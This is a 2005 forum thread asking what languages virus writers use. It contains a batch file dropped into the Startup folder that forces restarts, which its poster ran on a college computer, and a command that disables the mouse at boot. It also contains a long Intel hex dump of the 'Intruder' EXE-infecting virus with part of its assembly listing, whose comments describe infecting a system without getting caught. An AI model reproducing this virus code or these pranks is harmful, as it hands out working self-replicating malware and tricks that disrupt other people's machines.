# Language of Virus Writers



## Satissh S (Apr 10, 2005)

Can somebody explain me in what languages the viruses are written? The Fasttrack book was nice! But I wan't to know whether it's the conventional c ,c++ are the languages used for writing viruses. Do the virus programmers put the replicating code inside an infinite( for) loop!?Somebody explain Plz?????? How can they modify another programs coding? :roll:


----------



## amitsaudy (Apr 10, 2005)

Most virus writers prefer high level languages such as c,cpp etc.
Aso scripting languages such as pearl,vb script,jawa script are used extensively by virus writers.
But for hardcore virus writers the favourite choice is pure and simple ASSEMBLY language where you have no limitations at all.


----------



## khattam_ (Apr 10, 2005)

Virus exist in different forms and nature...... If you consider a program that harms you as a virus then Virus can be written in Notepad to Turbo C++. No limitations at all. You can write a virus in any programming language. It depends upon the your knowledge and creativity and no programming language will limit you...........


----------



## Ashootosh (Apr 11, 2005)

well said khattam.........
    even a two line batch file can become a virus (even though not very harmful), check it out, i did this in a my college computer(they were using xp):

in notepad: 

@echo off
shutdown -r 
@echo on

then I saved it as a.bat in startup folder and after this whenever pc starts it restart automatically after 60 secs........


----------



## hpotter606 (Apr 11, 2005)

Can you post the solution too???
So that i can try it!!


----------



## vasanth_12345 (Apr 11, 2005)

UR creativity is the limit man.Looking at the no. of viruses gives u the answer.Any way Ashootoosh can u explain me wat u have done I can understand that u have placed it as one of the startup files.Abt that echo off and echo on that is where i dont even understand a bit


----------



## swatkat (Apr 11, 2005)

if you use "@echo off" , subsequent commands in the Batch file after this statement does not get displayed. "@echo on" does the reverse thing of "@echo off".


----------



## khattam_ (Apr 12, 2005)

hpotter606 said:
			
		

> Can you post the solution too???
> So that i can try it!!


What kinda solution??


----------



## ctrl_alt_del (Apr 12, 2005)

He probably wants to know how you can undo the auto-shutdown effect once he has tried it somewhere.

I think deleting the batch file would suffice, offcourse within the 60 secs!


----------



## Ashootosh (Apr 13, 2005)

solution is->-> shutdown -a
    it will stop pc from shutting down

try shutdown/? for more commands

xp has many hidden features try explore all those


----------



## shaunak (Apr 14, 2005)

Satissh S said:
			
		

> Can somebody explain me in what languages the viruses are written? The Fasttrack book was nice! But I wan't to know whether it's the conventional c ,c++ are the languages used for writing viruses. Do the virus programmers put the replicating code inside an infinite( for) loop!?Somebody explain Plz?????? How can they modify another programs coding? :roll:



isnt the "for" loop only for java?


----------



## pirates1323 (Apr 14, 2005)

khattam_ said:
			
		

> If you consider a program that harms you as a virus then Virus can be written in Notepad to Turbo C++. No limitations at all.



   8)  8)  In notepad.. cool   ..... tell me how I can


----------



## Satissh S (Apr 14, 2005)

shaunak said:
			
		

> Satissh S said:
> 
> 
> 
> ...


 No , For loop is a basic loop structure that is almost in every programming language . It was designed for the elimination of GOTO statement from programs using the basic 7 control structures viz.
Sequence, three selection,three repetition.


----------



## khattam_ (Apr 14, 2005)

Ashootosh said:
			
		

> *solution is->-> shutdown -a*
> it will stop pc from shutting down
> 
> try shutdown/? for more commands
> ...


Not a very good solution.............. This has to be done every time you restart and if the command is in the Batch file, not sure if it works........................
Deleting the Batch file or editing the line containing the Shutdown command will do..............


----------



## khattam_ (Apr 14, 2005)

pirates1323 said:
			
		

> khattam_ said:
> 
> 
> 
> ...


Write the following command in *notepad* and save the text as "Virus.bat",  Plus open the autoexec.bat in *notepad* and add a line containing the path of the batch file you save...............
This will disable your Mouse................................. (works in Win98)


```
c:\windows\rundll.exe mouse,disable
```


Many Viral codes (eg Javascripts) can also be written in notepad........

I just mean to say that there is no specific language for writing viruses........


----------



## Ashootosh (Apr 19, 2005)

KHATTAM WROTE:


> Not a very good solution.............. This has to be done every time you restart and if the command is in the Batch file, not sure if it works........................
> Deleting the Batch file or editing the line containing the Shutdown command will do..............



I was telling him the technical solution................. not something lame as DELETING batch file, anybody can think bout this solution, no need to post this kind of lame solution!!!!!!!!!


----------



## khattam_ (Apr 19, 2005)

Ashootosh said:
			
		

> khAttAm_ said:
> 
> 
> 
> ...



The problem was lame too.............. and so are you.............


----------



## amitsaudy (Apr 20, 2005)

hee hee


----------



## khattam_ (Apr 20, 2005)

amitsaudy said:
			
		

> hee hee


Hey man
Whats the hehe about?? hehe


----------



## krishnathelord (Apr 21, 2005)

the main ques tion still remains that what is the lang. the hackers use


----------



## plasmafire (Apr 21, 2005)

lolz.. i love ASM embedded in C 4 destructive things (formatting, burning chips,platters etc)
VB for minor annoyances.
C++ for DOS attacks & other n/w attacks..

love it!!


----------



## khattam_ (Apr 21, 2005)

Copy the Contents from below, paste it to notepad, save the file and  scan it with an antivirus (i used Kaspersky)........

-----------------------Cut from here-------------------------------
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H* 
Echo `Virus in a Notepad`
cls
echo 'lol
echo 'Virus
echo 'I'm _khAttAm_
echo save it as a text file.....................
echo 'LOL
------------------------Cut from here-------------------------------

It should be treated as a virus. My Kaspersky does treat it as a virus. Hehe, but it is NOT a virus and does not ham to your computer.


----------



## qarch (Apr 22, 2005)

Hi every one! Are you trying to make a virus writer out of the thread initiator Satissh S?


----------



## BONZI (Apr 22, 2005)

These are not harmful man . Its just a prank.


----------



## Ashootosh (Apr 25, 2005)

sorry khattam I was not here to answer u. I think u r a bit confused, the problem was not mine , i was not the one who started this thread n i was quite surprised 2 c a lame person  callin me lame.

n i agree wid bonzi, these little tricks r just 4 fun not actual harmful viruses........


----------



## girish_b (Apr 29, 2005)

khattam_ said:
			
		

> Ashootosh said:
> 
> 
> 
> ...



one best place to find all of these command parameters are windows xp help and support.


----------



## Ashootosh (Apr 29, 2005)

u can also find alot of these commands in system32 directory
just go there from cmd n type --- dir *.exe/p
         u will find some more interesting commands like tsshutdn (u can even turn off comp in a LAN) etc etc


----------



## Satissh S (May 29, 2005)

Hey Guys I saw the the following in a book "*How do Viruses Work*.The hexadecimal liasting of the intruder virus is as follows:

:100000004D5A47000500020020001100FFFF650067
:100010000001259E0C0112001E00000001003401A9
:100020001200480112000000000000000000000063
:1000300000000000000000000000000000000000C0
:1000400000000000000000000000000000000000B0
:1000500000000000000000000000000000000000A0
:100060000000000000000000000000000000000090
:100070000000000000000000000000000000000080
:100080000000000000000000000000000000000070
:100090000000000000000000000000000000000060
:1000A0000000000000000000000000000000000050
:1000B0000000000000000000000000000000000040
:1000C0000000000000000000000000000000000030
:1000D0000000000000000000000000000000000020
:1000E0000000000000000000000000000000000010
:1000F0000000000000000000000000000000000000
:1001000000000000000000000000000000000000EF
:1001100000000000000000000000000000000000DF
:1001200000000000000000000000000000000000CF
:1001300000000000000000000000000000000000BF
:1001400000000000000000000000000000000000AF
:10015000000000000000000000000000000000009F
:10016000000000000000000000000000000000008F
:10017000000000000000000000000000000000007F
:10018000000000000000000000000000000000006F
:10019000000000000000000000000000000000005F
:1001A000000000000000000000000000000000004F
:1001B000000000000000000000000000000000003F
:1001C000000000000000000000000000000000002F
:1001D000000000000000000000000000000000001F
:1001E000000000000000000000000000000000000F
:1001F00000000000000000000000000000000000FF
:10020000494E5452554445522E455845008CC88E8F
:10021000D8BA0000B441CD21B44CB000CD210000CB
:1002200000000000000000000000000000000000CE
:1002300000000000000000000000000000000000BE
:1002400000000000000000000000000000000000AE
:10025000000000000000000000000000000000009E
:10026000000000000000000000000000000000008E
:10027000000000000000000000000000000000007E
:10028000000000000000000000000000000000006E
:10029000000000000000000000000000000000005E
:1002A000000000000000000000000000000000004E
:1002B000000000000000000000000000000000003E
:1002C000000000000000000000000000000000002E
:1002D000000000000000000000000000000000001E
:1002E000000000000000000000000000000000000E
:1002F00000000000000000000000000000000000FE
:1003000000000000000000000000000000000000ED
:1003100000000000000000000000000000000000DD
:10032000AAC800000000000000000000000000005B
:1003300000000000000000000000000000000000BD
:1003400000000000000000000000000000000000AD
:10035000000000000000000000000000000000009D
:10036000000000000000000000000000000000008D
:10037000000000000000000000000000000000007D
:10038000000000000000000000000000000000006D
:10039000000000000000000000000000000000005D
:1003A000000000000000000000000000000000004D
:1003B000000000000000000000000000000000003D
:1003C0000000005C2A2E455845005C2A2E2A0000B9
:1003D000000000000000000000000000000000001D
:1003E000000000000000000000000000000000000D
:1003F00000000000000000000000000000000000FD
:1004000000000000000000000000000000000000EC
:1004100000000000000000000000000000000000DC
:10042000000000000000000000000001508CC88E99
:10043000D88CC0A30400E867037518E86B03E86E66
:1004400003E826007509E89103E8E401E8CE03E833
:10045000760358BB0200FA8ED3BC00018E0604005E
:100460008E1E0400FBEA0D000000B05CA2AF00BECF
:10047000B00032D2B447CD21803EB00000750532C5
:10048000C0A2AF00B002A2FD00E81000740D32C09F
103 The Little Black Book of Computer Viruses
:10049000A2AF00FEC0A2FD00E80100C3E851007356
:1004A0004C803EFD0000743FFE0EFD00BFAF00BE5D
:1004B000AA00E8BB004757E8760075235F32C0AA60
:1004C000BFAF00BB4F00A0FD00B22BF6E203D88BFC
:1004D000F3E89C0057E8C4FF7412E8760074DDFE70
:1004E00006FD005F32C0AAB0010AC0C35F32C0C3BC
:1004F000BA0600B41ACD21BFAF00BEA300E8700059
:1005000057BAAF00B93F00B44ECD210AC075195F8C
:1005100047AABFAF00BE2400E855004F57E863006C
:10052000730CB44FCD21EBE35FC60500F9C35FC385
:10053000E8310052B41ACD21BAAF00B91000B44E60
:10054000CD215B0AC0751CF64715107406807F1E0E
:100550002E750EE80E0052B41ACD21B44FCD21EB0A
:10056000E132C0C3BA3100B02BF626FD0003D0C380
:10057000268A05470AC075F84F57FCACAA0AC07511
:10058000F95FC3E82300720DE80B007208E833003E
:100590007203E84500C3B04DB45A3B0687007402AD
:1005A000F9C333C02B06A100C3BAAF00B8023DCDDA
:1005B00021720FA3FE008BD8B91C00BA8700B43F8C
:1005C000CD21C3A18F0003C003C02B068D0003C043
:1005D00003C02B069F003D0800C3A19D0003068FAA
:1005E00000BA1000F7E28BCA8BD08B1EFE00B80059
:1005F00042CD21B43F8B1EFE00BA0901B90200CDE5
:1006000021720BA109013B060000F87501F9C3A096
:100610000501240F7419B910002AC8BA2705010E64
:10062000050183160701008B1EFE00B440CD21C3D7
:100630008B0E07018B1605018B1EFE00B80042CD04
:1006400021E8CBFFB9270533D28B1EFE00B440CD85
:10065000218B1605018B0E0701BB33014303D3BB6E
:10066000000013CB8B1EFE00B80042CD21BA9500CE
:100670008B1EFE00B90200B440CD218B1605018B04
:100680000E0701BB39014303D3BB000013CB8B1E04
:10069000FE00B80042CD21BA97008B1EFE00B902C1
:1006A00000B440CD218B1605018B0E0701BB45011F
:1006B00083C30103D3BB000013CB8B1EFE00B80025
:1006C00042CD21BA9B008B1EFE00B90400B440CD80
:1006D0002133C933D28B1EFE00B80042CD21A105C3
:1006E00001B104D3E88B1E070180E30FB104D2E30C
:1006F00002E32B068F00A39D00BB270583C310B127
:1007000004D3EB03C3A39500B80C01A39B00B8006E
:1007100001A397008B160701A10501BB270503C3A1
:1007200033DB13D305000213D350B109D3E8B1076B
:10073000D3E203C2A38B005825FF01A38900B802AE
:100740000001068D00B91C00BA87008B1EFE00B4A4
:1007500040CD21A18D004848BB0400F7E303069F6C
:1007600000BB000013D38BCA8BD08B1EFE00B800D9
:1007700042CD21A19D00BB330143891E8700A3897F
:1007800000A19D00BB450183C303891E8B00A38D7F
:1007900000B90800BA87008B1EFE00B440CD21C30B
:1007A00032E4C3CD1A80E200C3B090A28204C3B485
:1007B0002FCD21891E02008CC0A304008CC88EC0DE
:1007C000BA0600B41ACD21C38B160200A104008E14
 The INTRUDER Virus 104
:1007D000D8B41ACD218CC88ED8C3B443B000BAAFF8
:1007E00000CD21880E0001B443B001BAAF00B100C2
:1007F000CD21BAAF00B002B43DCD21A3FE00B45765
:1008000032C08B1EFE00CD21890E01018916030125
:10081000A12200A30701A12000A30501C38B160399
:10082000018B0E0101B457B0018B1EFE00CD21B427
:100830003E8B1EFE00CD218A0E000132EDB443B086
:0708400001BAAF00CD21C396
:00000001FF
The assembly language listing of the Intruder virus follows:
;The Intruder Virus is an EXE file infector which can jump from directory to
;directory and disk to disk. It attaches itself to the end of a file and
;modifies the EXE file header so that it gets control first, before the host
;program. When it is done doing its job, it passes control to the host program,
;so that the host executes without a hint that the virus is there.
.SEQ ;segments must appear in sequential order
;to simulate conditions in active virus
;MGROUP GROUP HOSTSEG,HSTACK ;Host segments grouped together
;HOSTSEG program code segment. The virus gains control before this routine and
;attaches itself to another EXE file. As such, the host program for this
;installer simply tries to delete itself off of disk and terminates. That is
;worthwhile if you want to infect a system with the virus without getting
;caught. Just execute the program that infects, and it disappears without a
;trace. You might want to name the program something more innocuous, though.
HOSTSEG SEGMENT BYTE
ASSUME CS:HOSTSEG,SS:HSTACK
PGMSTR DB ’INTRUDER.EXE’,0
HOST:
mov ax,cs ;we want DS=CS here
mov ds,ax
mov dx,OFFSET PGMSTR
mov ah,41H
int 21H ;delete this exe file
mov ah,4CH
mov al,0
int 21H ;terminate normally
HOSTSEG ENDS
;Host program stack segment
HSTACK SEGMENT PARA STACK
db 100H dup (?) ;100 bytes long
HSTACK ENDS


*What do the above lines convey?*


----------



## visvo (Jun 1, 2005)

Hey ! You can read Ankit Fadia'z " Unoffical Guide to Ethical Hacking" or check him online at www.ankitfadia.com, this delhi guy has got all the ans of your Questions. in his Book


----------



## maverickrohan (Jun 2, 2005)

@Khattam

dude....that "X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*"  is just a virus signature..........without the body obvio its not the complete virus.........dont tell ppl to try such silly stuff..........u can put thousands of signatures in notepad n scan them n itl ve detected as a virus.............

P.S. : there was no need for u to add the remaining lines...........

Well Python is one more language used by virus writers.......


@satis
thats just a HEX dump uv posted ot ther........u need to reverse engineer it to figure out what it means...

@<everyone>
try

www.exetools.com     for some intersting stuff...!!!


----------

